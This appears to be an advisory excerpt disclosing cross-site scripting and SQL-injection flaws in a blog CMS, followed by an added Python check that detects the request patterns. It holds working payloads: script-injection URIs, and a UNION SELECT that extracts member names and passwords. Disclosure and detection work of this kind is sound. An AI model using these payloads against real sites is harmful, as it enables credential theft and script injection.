The following example URIs demonstrate cross-site scripting and SQL-injection attacks:

http://www.example.com/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*

http://www.example.com/photo/admin.php/"><script>alert('DSECRG_XSS')</script>

http://www.example.com/photo/index.php/"><script>alert('DSECRG_XSS')</script>

http://www.example.com/index.php?query=asd&amount=0&blogid=1'<script>alert('DSecRG_XSS')</script>;&x=34&y=6

http://www.example.com/admin/plugins/table/index.php?action=edittemplate&field=title'<script>a=/DSecRG XSS/%0d%0aalert(a.source)</script>&id=2&text=0

The following POST request demonstrates an SQL-injection issue:

POST /blogcms/action.php HTTP/1.0
Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727)
Host: 192.168.40.33
Pragma: no-cache
Connection: Keep-Alive

action=addcomment&url=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1&itemid=1&body=asd&&userid=asd&x=42&y=13&user=asd'+[DSecRG_INJECTION]
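
A detection-side check for the request shapes shown above, as an added example that is not part of the original advisory: it flags markup in the path info after a .php script, a non-integer blogid, a quote in user, and script tags in any parameter. The function names, the finding labels and the rules that blogid is an integer and user contains no quote are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumptions (not from the advisory): blogid is always a plain integer and
# user names never contain a single quote.
INTEGER_PARAMS = {"blogid"}
NO_QUOTE_PARAMS = {"user"}
PATH_INFO = re.compile(r"\.php/(.*)$", re.S)   # anything after script.php/
MARKUP = re.compile(r"[<>\"]")
SCRIPT_TAG = re.compile(r"<\s*script", re.I)


def inspect_request(target, body=""):
    """Return sorted finding labels for a request target and its form body."""
    findings = set()
    parts = urlsplit(target)
    info = PATH_INFO.search(unquote(parts.path))
    if info and MARKUP.search(info.group(1)):
        findings.add("markup-in-path-info")
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for name, value in parse_qsl(parts.query) + parse_qsl(body):
        if name in INTEGER_PARAMS and not re.fullmatch(r"\d+", value):
            findings.add("non-integer-" + name)
        if name in NO_QUOTE_PARAMS and "'" in value:
            findings.add("quote-in-" + name)
        if SCRIPT_TAG.search(value):
            findings.add("script-tag-in-" + name)
    return sorted(findings)


# First four: from the advisory's examples. Last: constructed benign request.
SAMPLES = [
    ("/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,"
     "6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*", ""),
    ("/photo/admin.php/\"><script>alert('DSECRG_XSS')</script>", ""),
    ("/index.php?query=asd&amount=0&blogid=1'<script>alert('DSecRG_XSS')</script>;"
     "&x=34&y=6", ""),
    ("/blogcms/action.php",
     "action=addcomment&url=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1"
     "&itemid=1&body=asd&&userid=asd&x=42&y=13&user=asd'+[DSecRG_INJECTION]"),
    ("/index.php?query=asd&amount=0&blogid=1&x=34&y=6", ""),
]


def scan_samples():
    """Findings for each sample, in order."""
    return [inspect_request(target, body) for target, body in SAMPLES]
```

Ordinary path info such as /index.php/archive/2008 passes the check, because only quote and angle-bracket characters after the script name are flagged.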